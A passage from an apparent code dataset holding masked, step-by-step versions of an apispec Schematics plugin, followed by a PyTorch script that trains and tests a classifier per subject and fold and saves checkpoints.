warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-2": "<mask token>\n\n\nclass SchematicsPlugin(BasePlugin):\n <mask token>\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major 
>= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n schema_instance = resolve_schema_instance(schema)\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n return json_schema\n\n def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. 
May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-3": "<mask token>\n\n\nclass SchematicsPlugin(BasePlugin):\n \"\"\"APISpec plugin handling schematics models\n\n :param callable schema_name_resolver: Callable to generate the schema definition name.\n Receives the `Schema` class and returns the name to be used in refs within\n the generated spec. When working with circular referencing this function\n must must not return `None` for schemas in a circular reference chain.\n\n Example: ::\n\n def schema_name_resolver(schema):\n return schema.__name__\n \"\"\"\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - 
modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major >= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n schema_instance = resolve_schema_instance(schema)\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n return json_schema\n\n def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: 
parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-4": "<mask token>\n\n\ndef resolver(schema):\n \"\"\"Default implementation of a schema name resolver function\n \"\"\"\n name = schema.__name__\n if name.endswith('Schema'):\n return name[:-6] or name\n return name\n\n\nclass SchematicsPlugin(BasePlugin):\n \"\"\"APISpec plugin handling schematics models\n\n :param callable schema_name_resolver: Callable to generate the schema definition name.\n Receives the `Schema` class and returns the name to be used in refs within\n the generated spec. When working with circular referencing this function\n must must not return `None` for schemas in a circular reference chain.\n\n Example: ::\n\n def schema_name_resolver(schema):\n return schema.__name__\n \"\"\"\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(openapi_version=spec.\n openapi_version, schema_name_resolver=self.schema_name_resolver,\n spec=spec)\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(parameter.get\n ('schema', {}), dict):\n schema_instance = resolve_schema_instance(parameter['schema'])\n if 'in' in parameter:\n del parameter['schema']\n resolved += self.openapi.schema2parameters(schema_instance,\n default_in=parameter.pop('in'), **parameter)\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body['content']\n for content_type in content:\n schema = 
content[content_type]['schema']\n content[content_type]['schema'] = self.openapi.resolve_schema_dict(\n schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n if 'schema' in data:\n data['schema'] = self.openapi.resolve_schema_dict(data['schema'])\n if self.openapi_version.major >= 3:\n if 'content' in data:\n for content_type in data['content']:\n schema = data['content'][content_type]['schema']\n data['content'][content_type]['schema'\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n schema_instance = resolve_schema_instance(schema)\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n return json_schema\n\n 
def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if 'parameters' in operation:\n operation['parameters'] = self.resolve_parameters(operation\n ['parameters'])\n if self.openapi_version.major >= 3:\n if 'requestBody' in operation:\n self.resolve_schema_in_request_body(operation[\n 'requestBody'])\n for response in operation.get('responses', {}).values():\n self.resolve_schema(response)\n if 'headers' in response:\n for header in response['headers'].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n '{} has already been added to the spec. Adding it twice may cause references to not resolve properly.'\n .format(schema_key[0]), UserWarning)\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\"\"\"\n openapi.schematics\n ~~~~~~~~~~~~~~~~~~\n Schematics plugin for apispec based on ext.MarshmallowPlugin\n\"\"\"\nimport warnings\n\nfrom apispec import BasePlugin\nfrom .common import resolve_schema_instance, make_schema_key\nfrom .openapi import OpenAPIConverter\n\n\ndef resolver(schema):\n \"\"\"Default implementation of a schema name resolver function\n \"\"\"\n name = schema.__name__\n if name.endswith(\"Schema\"):\n return name[:-6] or name\n return name\n\n\nclass SchematicsPlugin(BasePlugin):\n \"\"\"APISpec plugin handling schematics models\n\n :param callable schema_name_resolver: Callable to generate the schema definition name.\n Receives the `Schema` class and returns the name to be used in refs within\n the generated spec. When working with circular referencing this function\n must must not return `None` for schemas in a circular reference chain.\n\n Example: ::\n\n def schema_name_resolver(schema):\n return schema.__name__\n \"\"\"\n\n def __init__(self, schema_name_resolver=None):\n super().__init__()\n self.schema_name_resolver = schema_name_resolver or resolver\n self.spec = None\n self.openapi_version = None\n self.openapi = None\n\n def init_spec(self, spec):\n super().init_spec(spec)\n self.spec = spec\n self.openapi_version = spec.openapi_version\n self.openapi = OpenAPIConverter(\n openapi_version=spec.openapi_version,\n schema_name_resolver=self.schema_name_resolver,\n spec=spec,\n )\n\n def resolve_parameters(self, parameters):\n resolved = []\n for parameter in parameters:\n if isinstance(parameter, dict) and not isinstance(\n parameter.get(\"schema\", {}), dict\n ):\n schema_instance = resolve_schema_instance(parameter[\"schema\"])\n if \"in\" in parameter:\n del parameter[\"schema\"]\n resolved += self.openapi.schema2parameters(\n schema_instance, default_in=parameter.pop(\"in\"), **parameter\n )\n continue\n self.resolve_schema(parameter)\n resolved.append(parameter)\n return resolved\n\n def 
resolve_schema_in_request_body(self, request_body):\n \"\"\"Function to resolve a schema in a requestBody object - modifies then\n response dict to convert Marshmallow Schema object or class into dict\n \"\"\"\n content = request_body[\"content\"]\n for content_type in content:\n schema = content[content_type][\"schema\"]\n content[content_type][\"schema\"] = self.openapi.resolve_schema_dict(schema)\n\n def resolve_schema(self, data):\n \"\"\"Function to resolve a schema in a parameter or response - modifies the\n corresponding dict to convert Marshmallow Schema object or class into dict\n\n :param APISpec spec: `APISpec` containing refs.\n :param dict|str data: either a parameter or response dictionary that may\n contain a schema, or a reference provided as string\n \"\"\"\n if not isinstance(data, dict):\n return\n\n # OAS 2 component or OAS 3 header\n if \"schema\" in data:\n data[\"schema\"] = self.openapi.resolve_schema_dict(data[\"schema\"])\n # OAS 3 component except header\n if self.openapi_version.major >= 3:\n if \"content\" in data:\n for content_type in data[\"content\"]:\n schema = data[\"content\"][content_type][\"schema\"]\n data[\"content\"][content_type][\n \"schema\"\n ] = self.openapi.resolve_schema_dict(schema)\n\n def map_to_openapi_type(self, *args):\n \"\"\"Decorator to set mapping for custom fields.\n\n ``*args`` can be:\n\n - a pair of the form ``(type, format)``\n - a core marshmallow field type (in which case we reuse that type's mapping)\n\n Examples: ::\n\n @ma_plugin.map_to_openapi_type('string', 'uuid')\n class MyCustomField(Integer):\n # ...\n\n @ma_plugin.map_to_openapi_type(Integer) # will map to ('integer', 'int32')\n class MyCustomFieldThatsKindaLikeAnInteger(Integer):\n # ...\n \"\"\"\n return self.openapi.map_to_openapi_type(*args)\n\n def schema_helper(self, name, _, schema=None, **kwargs):\n \"\"\"Definition helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` to provide OpenAPI\n metadata.\n\n :param 
type|Schema schema: A marshmallow Schema class or instance.\n \"\"\"\n if schema is None:\n return None\n\n schema_instance = resolve_schema_instance(schema)\n\n schema_key = make_schema_key(schema_instance)\n self.warn_if_schema_already_in_spec(schema_key)\n self.openapi.refs[schema_key] = name\n\n json_schema = self.openapi.schema2jsonschema(schema_instance)\n\n return json_schema\n\n def parameter_helper(self, parameter, **kwargs):\n \"\"\"Parameter component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in parameter definition.\n\n :param dict parameter: parameter fields. May contain a marshmallow\n Schema class or instance.\n \"\"\"\n # In OpenAPIv3, this only works when using the complex form using \"content\"\n self.resolve_schema(parameter)\n return parameter\n\n def response_helper(self, response, **kwargs):\n \"\"\"Response component helper that allows using a marshmallow\n :class:`Schema <marshmallow.Schema>` in response definition.\n\n :param dict parameter: response fields. 
May contain a marshmallow\n Schema class or instance.\n \"\"\"\n self.resolve_schema(response)\n if \"headers\" in response:\n for header in response[\"headers\"].values():\n self.resolve_schema(header)\n return response\n\n def operation_helper(self, operations, **kwargs):\n for operation in operations.values():\n if not isinstance(operation, dict):\n continue\n if \"parameters\" in operation:\n operation[\"parameters\"] = self.resolve_parameters(\n operation[\"parameters\"]\n )\n if self.openapi_version.major >= 3:\n if \"requestBody\" in operation:\n self.resolve_schema_in_request_body(operation[\"requestBody\"])\n for response in operation.get(\"responses\", {}).values():\n self.resolve_schema(response)\n if \"headers\" in response:\n for header in response[\"headers\"].values():\n self.resolve_schema(header)\n\n def warn_if_schema_already_in_spec(self, schema_key):\n \"\"\"Method to warn the user if the schema has already been added to the\n spec.\n \"\"\"\n if schema_key in self.openapi.refs:\n warnings.warn(\n \"{} has already been added to the spec. Adding it twice may \"\n \"cause references to not resolve properly.\".format(schema_key[0]),\n UserWarning,\n )\n",
"step-ids": [
9,
12,
13,
14,
16
]
}
|
[
9,
12,
13,
14,
16
] |
from utils import *
import copy
import torch.nn as nn
# Cache GPU availability once at import time; checked before every
# .cuda() transfer of models and batches below.
CUDA = torch.cuda.is_available()
def train_one_epoch(data_loader, net, loss_fn, optimizer):
    """Run one optimization pass over ``data_loader``.

    :param data_loader: iterable yielding ``(x_batch, y_batch)`` tensor pairs
    :param net: model to train (switched to train mode here)
    :param loss_fn: criterion mapping ``(logits, labels)`` to a scalar loss
    :param optimizer: optimizer updating ``net``'s parameters
    :return: tuple ``(mean_loss, predicted_labels, true_labels)`` where the
        label lists cover every sample seen this epoch, in batch order
    """
    net.train()
    tl = Averager()
    pred_train = []
    act_train = []
    for i, (x_batch, y_batch) in enumerate(data_loader):
        if CUDA:
            x_batch, y_batch = x_batch.cuda(), y_batch.cuda()
        out = net(x_batch)
        loss = loss_fn(out, y_batch)
        # Class prediction = argmax over the logit dimension.
        _, pred = torch.max(out, 1)
        # Accumulate the detached Python scalar, not the loss tensor:
        # storing the tensor would keep its autograd graph alive for the
        # whole epoch, and predict() already uses loss.item().
        tl.add(loss.item())
        pred_train.extend(pred.data.tolist())
        act_train.extend(y_batch.data.tolist())
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    return tl.item(), pred_train, act_train
def predict(data_loader, net, loss_fn):
    """Evaluate ``net`` on ``data_loader`` with gradient tracking disabled.

    :param data_loader: iterable yielding ``(inputs, labels)`` tensor pairs
    :param net: model to evaluate (switched to eval mode here)
    :param loss_fn: criterion mapping ``(logits, labels)`` to a scalar loss
    :return: tuple ``(mean_loss, predicted_labels, true_labels)``
    """
    net.eval()
    predictions = []
    targets = []
    meter = Averager()
    with torch.no_grad():
        for inputs, labels in data_loader:
            if CUDA:
                inputs = inputs.cuda()
                labels = labels.cuda()
            logits = net(inputs)
            batch_loss = loss_fn(logits, labels)
            # argmax over the class dimension gives the same indices as
            # the (values, indices) pair from torch.max(logits, 1).
            predicted = logits.argmax(dim=1)
            meter.add(batch_loss.item())
            predictions.extend(predicted.data.tolist())
            targets.extend(labels.data.tolist())
    return meter.item(), predictions, targets
def set_up(args):
    """Prepare the runtime environment for an experiment.

    Selects the GPU to use, makes sure the save directory exists, and
    seeds torch for reproducible runs.

    :param args: parsed argument namespace; reads ``gpu``, ``save_path``
        and ``random_seed``
    """
    set_gpu(args.gpu)
    ensure_path(args.save_path)
    torch.manual_seed(args.random_seed)
    # Force deterministic cuDNN kernels so repeated runs with the same
    # seed produce identical results (at some speed cost).
    torch.backends.cudnn.deterministic = True
def train(args, data_train, label_train, data_val, label_val, subject, fold):
    """Train a model for one subject/fold and log per-epoch metrics.

    Every epoch runs one training pass and one validation pass; the model
    with the best validation accuracy so far is checkpointed as
    ``max-acc.pth`` (and, when ``args.save_model`` is set, also under a
    per-subject/per-fold name so runs can be reproduced later).

    :param args: parsed argument namespace (batch size, learning rate,
        max epochs, save paths, ...)
    :param data_train: training samples
    :param label_train: training labels
    :param data_val: validation samples
    :param label_val: validation labels
    :param subject: subject index, used only in file names and logging
    :param fold: fold index, used only in file names and logging
    :return: best validation accuracy reached during training
    """
    seed_all(args.random_seed)
    save_name = '_sub' + str(subject) + '_trial' + str(fold)
    set_up(args)
    train_loader = get_dataloader(data_train, label_train, args.batch_size)
    val_loader = get_dataloader(data_val, label_val, args.batch_size)
    model = get_model(args)
    para = get_trainable_parameter_num(model)
    print('Model {} size:{}'.format(args.model, para))
    if CUDA:
        model = model.cuda()
    optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)
    loss_fn = nn.CrossEntropyLoss()
    def save_model(name):
        # Overwrite any previous checkpoint of the same name.
        previous_model = osp.join(args.save_path, '{}.pth'.format(name))
        if os.path.exists(previous_model):
            os.remove(previous_model)
        torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.format(name)))
    # Training log: per-epoch loss/accuracy curves plus the run arguments,
    # serialized with torch.save at the end of the run.
    trlog = {}
    trlog['args'] = vars(args)
    trlog['train_loss'] = []
    trlog['val_loss'] = []
    trlog['train_acc'] = []
    trlog['val_acc'] = []
    trlog['max_acc'] = 0.0
    timer = Timer()
    for epoch in range(1, args.max_epoch + 1):
        loss_train, pred_train, act_train = train_one_epoch(
            data_loader=train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)
        acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=act_train)
        print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'
              .format(epoch, loss_train, acc_train, f1_train))
        loss_val, pred_val, act_val = predict(
            data_loader=val_loader, net=model, loss_fn=loss_fn
        )
        acc_val, f1_val, _ = get_metrics(y_pred=pred_val, y_true=act_val)
        print('epoch {}, val, loss={:.4f} acc={:.4f} f1={:.4f}'.
              format(epoch, loss_val, acc_val, f1_val))

        # Checkpoint whenever validation accuracy improves.
        if acc_val > trlog['max_acc']:
            trlog['max_acc'] = acc_val
            save_model('max-acc')
            if args.save_model:
                # save model here for reproduce
                model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold) + '.pth'
                data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type)
                save_path = osp.join(args.save_path, data_type)
                ensure_path(save_path)
                model_name_reproduce = osp.join(save_path, model_name_reproduce)
                torch.save(model.state_dict(), model_name_reproduce)

        trlog['train_loss'].append(loss_train)
        trlog['train_acc'].append(acc_train)
        trlog['val_loss'].append(loss_val)
        trlog['val_acc'].append(acc_val)

        print('ETA:{}/{} SUB:{} FOLD:{}'.format(timer.measure(), timer.measure(epoch / args.max_epoch),
                                                subject, fold))
    # Persist the full training log for this subject/fold.
    save_name_ = 'trlog' + save_name
    ensure_path(osp.join(args.save_path, 'log_train'))
    torch.save(trlog, osp.join(args.save_path, 'log_train', save_name_))

    return trlog['max_acc']
def test(args, data, label, reproduce, subject, fold):
    """Evaluate a trained checkpoint on held-out data.

    When ``reproduce`` is true, the per-subject/per-fold checkpoint that
    train() wrote under ``args.save_path`` is loaded; otherwise the
    checkpoint at ``args.load_path`` is used.

    :param args: parsed argument namespace (batch size, paths, ...)
    :param data: test samples
    :param label: test labels
    :param reproduce: whether to load the reproduction checkpoint
    :param subject: subject index used to locate the checkpoint
    :param fold: fold index used to locate the checkpoint
    :return: tuple ``(accuracy, predicted_labels, true_labels)``
    """
    seed_all(args.random_seed)
    set_up(args)
    test_loader = get_dataloader(data, label, args.batch_size, False)
    model = get_model(args)
    if CUDA:
        model = model.cuda()
    loss_fn = nn.CrossEntropyLoss()
    if reproduce:
        # Rebuild the exact path train() used when saving the
        # reproduction checkpoint for this subject/fold.
        checkpoint_dir = osp.join(
            args.save_path,
            'model_{}_{}_{}'.format(args.dataset, args.data_format, args.label_type))
        ensure_path(checkpoint_dir)
        checkpoint_file = osp.join(
            checkpoint_dir, 'sub' + str(subject) + '_fold' + str(fold) + '.pth')
        model.load_state_dict(torch.load(checkpoint_file))
    else:
        model.load_state_dict(torch.load(args.load_path))
    test_loss, predictions, actuals = predict(
        data_loader=test_loader, net=model, loss_fn=loss_fn)
    acc, f1, cm = get_metrics(y_pred=predictions, y_true=actuals)
    print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(test_loss, acc, f1))
    return acc, predictions, actuals
|
normal
|
{
"blob_id": "6ef78e4308f6e693f50df714a5d7af1785e49d7a",
"index": 7682,
"step-1": "<mask token>\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\n<mask token>\n\n\ndef test(args, data, label, reproduce, subject, fold):\n seed_all(args.random_seed)\n set_up(args)\n test_loader = get_dataloader(data, label, args.batch_size, False)\n model = get_model(args)\n if CUDA:\n model = model.cuda()\n loss_fn = nn.CrossEntropyLoss()\n if reproduce:\n model_name_reproduce = 'sub' + str(subject) + '_fold' + str(fold\n ) + '.pth'\n data_type = 'model_{}_{}_{}'.format(args.dataset, args.data_format,\n args.label_type)\n save_path = osp.join(args.save_path, data_type)\n ensure_path(save_path)\n model_name_reproduce = osp.join(save_path, model_name_reproduce)\n model.load_state_dict(torch.load(model_name_reproduce))\n else:\n model.load_state_dict(torch.load(args.load_path))\n loss, pred, act = predict(data_loader=test_loader, net=model, loss_fn=\n loss_fn)\n acc, f1, cm = get_metrics(y_pred=pred, y_true=act)\n print('>>> Test: loss={:.4f} acc={:.4f} f1={:.4f}'.format(loss, acc, f1))\n return acc, pred, act\n",
"step-2": "<mask token>\n\n\ndef predict(data_loader, net, loss_fn):\n net.eval()\n pred_val = []\n act_val = []\n vl = Averager()\n with torch.no_grad():\n for i, (x_batch, y_batch) in enumerate(data_loader):\n if CUDA:\n x_batch, y_batch = x_batch.cuda(), y_batch.cuda()\n out = net(x_batch)\n loss = loss_fn(out, y_batch)\n _, pred = torch.max(out, 1)\n vl.add(loss.item())\n pred_val.extend(pred.data.tolist())\n act_val.extend(y_batch.data.tolist())\n return vl.item(), pred_val, act_val\n\n\ndef set_up(args):\n set_gpu(args.gpu)\n ensure_path(args.save_path)\n torch.manual_seed(args.random_seed)\n torch.backends.cudnn.deterministic = True\n\n\ndef train(args, data_train, label_train, data_val, label_val, subject, fold):\n seed_all(args.random_seed)\n save_name = '_sub' + str(subject) + '_trial' + str(fold)\n set_up(args)\n train_loader = get_dataloader(data_train, label_train, args.batch_size)\n val_loader = get_dataloader(data_val, label_val, args.batch_size)\n model = get_model(args)\n para = get_trainable_parameter_num(model)\n print('Model {} size:{}'.format(args.model, para))\n if CUDA:\n model = model.cuda()\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learning_rate)\n loss_fn = nn.CrossEntropyLoss()\n\n def save_model(name):\n previous_model = osp.join(args.save_path, '{}.pth'.format(name))\n if os.path.exists(previous_model):\n os.remove(previous_model)\n torch.save(model.state_dict(), osp.join(args.save_path, '{}.pth'.\n format(name)))\n trlog = {}\n trlog['args'] = vars(args)\n trlog['train_loss'] = []\n trlog['val_loss'] = []\n trlog['train_acc'] = []\n trlog['val_acc'] = []\n trlog['max_acc'] = 0.0\n timer = Timer()\n for epoch in range(1, args.max_epoch + 1):\n loss_train, pred_train, act_train = train_one_epoch(data_loader=\n train_loader, net=model, loss_fn=loss_fn, optimizer=optimizer)\n acc_train, f1_train, _ = get_metrics(y_pred=pred_train, y_true=\n act_train)\n print('epoch {}, loss={:.4f} acc={:.4f} f1={:.4f}'.format(epoch,\n 
